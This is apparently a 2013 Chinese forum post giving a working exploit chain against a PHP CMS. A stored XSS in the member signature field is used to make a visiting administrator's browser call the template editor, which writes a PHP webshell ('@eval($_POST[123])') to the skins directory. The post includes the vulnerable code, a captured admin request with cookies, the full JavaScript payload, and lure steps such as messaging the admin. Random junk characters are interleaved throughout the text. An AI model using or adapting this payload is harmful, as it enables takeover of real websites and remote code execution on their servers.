|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题$ Y7 k, b; j0 m
官网已经修补了,所以重新下了源码
1 s8 T9 Z9 }! F/ `- _) F4 T因为 后台登入 还需要认证码 所以 注入就没看了。3 {9 _* U* c' R! C* g# @; I" v9 y1 P
存在 xss, F, x0 L4 \1 V0 ?9 Z4 C, B
漏洞文件 user/member/skin_edit.php
4 r; A: ~1 p' }本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:2 j: l* K4 T& t S. `( K/ N& s
* D9 n; ~" o( h, g1 L, d
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>
& O a! \& x- Q& k 3 i* a) r8 f8 ^5 ~
</textarea></td></tr># [, {: i9 T: |2 ~4 K) E( ]
9 H. E# n1 ~# I) U/ M) B( d% ^ user/do.php 2 }) A7 u3 j+ a
+ S* P( i5 u4 {" L( Y
1 N2 f7 n+ l* Q. Z" p7 k$ lif($op=='zl'){ //资料
$ t) A$ ~: t& t* e9 ?2 V + u! q9 R2 h1 g( n0 ?2 j
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) - P4 t% z, g5 B: x, T2 M
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));) y5 F8 z' y' O
3 m9 ~% f1 o$ a) T1 r0 j $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
, ~7 j9 N$ ?) j* a) I! s6 C9 K6 m
/ P; z5 j- `6 s4 }& f, T CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'
+ ?; z8 a4 i/ k& x$ H w/ Y where CS_Name='".$cscms_name."'";* T- f! f7 I3 U2 `+ g& @
0 D' L7 n( P/ Q, a4 E: v if($db->query($sql)){
' `$ K4 L+ ]: i; D7 r. p* |
: t- F8 ]8 |1 z6 S7 S1 `1 N exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));/ r0 |0 Q* F! m* H% f
% G: `3 m }3 n# S! s n5 G+ X }else{8 Z6 i1 D: @1 [3 m: N
) T' K. @* }# Q) a ]+ E exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
, |4 [) R) f- p R- n* H' ]5 g" ~+ B 7 D1 x/ t2 K1 a$ q+ n4 m
}
% n9 a; o* E( ?% j8 M
7 ^$ ^1 p/ t4 Z) b, ~1 c+ N5 ?4 k5 K3 z$ r8 [4 W! {+ ]
没有 过滤导致xss产生。5 A! L+ a2 U( {8 H# J0 e. ?
后台 看了下 很奇葩的是可以写任意格式文件。。; j X7 s7 e: s7 d8 a
抓包。。% @8 B/ i; }+ M) Y1 `2 c
% |7 C9 w' b1 ]/ R) A4 E# K% X
7 H6 I5 ^0 a$ `: q8 P% r; a( }2 J
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
7 T$ C& k+ x3 o% f" A# H! s
) R1 _( O. D0 K) G7 PAccept: text/html, application/xhtml+xml, */*9 M0 u. v2 q3 Q3 g- [
- |- W0 E+ Y8 `, P7 }/ {! R& z
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php# C' w+ O; A+ e$ b, k( C. }
( b) w* Q7 m9 e4 \2 wAccept-Language: zh-CN
" d, o- Y% X, k8 ^ X) |9 V , x( V/ Q( x2 o' Z& E
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)1 P6 G9 R; D5 Z( d! m+ e
|% z3 E0 p% D1 W. s7 U* w( fContent-Type: application/x-www-form-urlencoded
/ M! W3 M: X- z& f8 r, \
5 |5 I% Q# D: _ H Y7 Y2 A) D: fAccept-Encoding: gzip, deflate! s" ^* N3 g( z
1 X, X% o; }. x/ x' b
Host: 127.0.0.1
7 S2 }+ [- \ v3 A: h( E 7 v5 v# i* a$ n- {* `5 |" J% Y5 }
Content-Length: 38! h0 w: j- X# ^, t/ i! Q6 ]
) p! i/ ]7 J# o# ~0 I: XDNT: 1/ T" J) ~5 R3 q6 V$ a1 C; @4 G
; i9 j4 d( |$ R( \
Connection: Keep-Alive
: K8 U7 r7 ~) J3 N" x& V
% P) l. ?* d! s& sCache-Control: no-cache+ }5 X8 G4 p5 c3 _& p
3 z p! `7 O) Q( V# o$ R" TCookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594/ C2 h$ A l$ W) L( S4 j/ x
0 A+ q# Q& f1 X# I( f$ H, |7 c4 H$ q# T \8 H, o! ~( K
name=aaa.php&content=%3Cs%3E%3Ca%25%3E' _) r8 v4 S: k# Z
1 z' ?2 f( |( c( B( V k( Z- |& P6 [5 T
4 p9 P4 ]5 z2 o. ^
于是 构造js如下。3 x' i; g9 r& Y9 | e, u
y, ~$ b. ^: Y. ~/ S$ f0 I本帖隐藏的内容<script> ; x% R- R% \9 u8 M4 ?
thisTHost = top.location.hostname;
7 |; u; n+ w4 |5 c8 m : b* |! P% i& @+ u, q
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
1 ^0 x+ i0 K! e) c5 }) _
9 O5 H# v. |8 L# ]5 i1 y8 M$ X& T9 u$ Gfunction PostSubmit(url, data, msg) { ( W) I, D8 w+ N
var postUrl = url; V0 t+ }1 k/ b
$ P5 J. X- \' B1 S9 o' |9 e; a
var postData = data; 8 ~, n/ b# p8 x
var msgData = msg; - |: ], A: ?/ X; p! C+ ]
var ExportForm = document.createElement("FORM"); 9 { u5 K3 Z# D4 Y" S9 J1 G: O9 H$ w
document.body.appendChild(ExportForm); / }4 h9 Y' R2 B; Z4 z4 n6 ^6 r
ExportForm.method = "POST"; 1 {1 j" \7 U! H6 e L. |3 L1 M
var newElement = document.createElement("input");
# e# Q+ G% q* f: W8 y ~& _ newElement.setAttribute("name", "name"); , J( }: M }9 H( ^# H
newElement.setAttribute("type", "hidden"); 0 p! o& w, m h
var newElement2 = document.createElement("input"); % E# c* m9 c7 ^, A
newElement2.setAttribute("name", "content");
- W& B' P! ^9 A( D2 J+ j' c% p newElement2.setAttribute("type", "hidden"); ) T6 m, {/ R+ o* E
ExportForm.appendChild(newElement); : G( B" e1 I/ o6 `: C* a" w
ExportForm.appendChild(newElement2);
! D9 B z' z/ U5 C newElement.value = postData;
6 t3 m& |4 f9 k0 A) X/ g newElement2.value = msgData; 2 Y/ o6 d1 Y. i
ExportForm.action = postUrl; 2 c- @% Y8 o( x( P/ }4 @
ExportForm.submit();
5 c& [9 c. G7 z- [/ e! d};
0 r0 R/ \2 C* i: i4 A/ U( a. _+ z
; V. U3 U3 ~0 c8 \' fPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");6 b7 `% J# I- X6 Y, |7 C
* `/ a9 p. M1 q: J7 f: h0 U</script>6 h6 }1 q0 d7 |3 ^
% w3 z' L; t6 @7 {$ M2 f5 M3 N
* b/ T# k3 i& _5 m8 f2 U$ S4 N
. v: C: l1 T1 E3 ^/ k/ D4 z, \http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
/ T" b* o6 X0 x用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)1 i Q) b. U' I& y2 I; O, P
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
2 f# o( J* H: J* S5 f- O: k' {
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对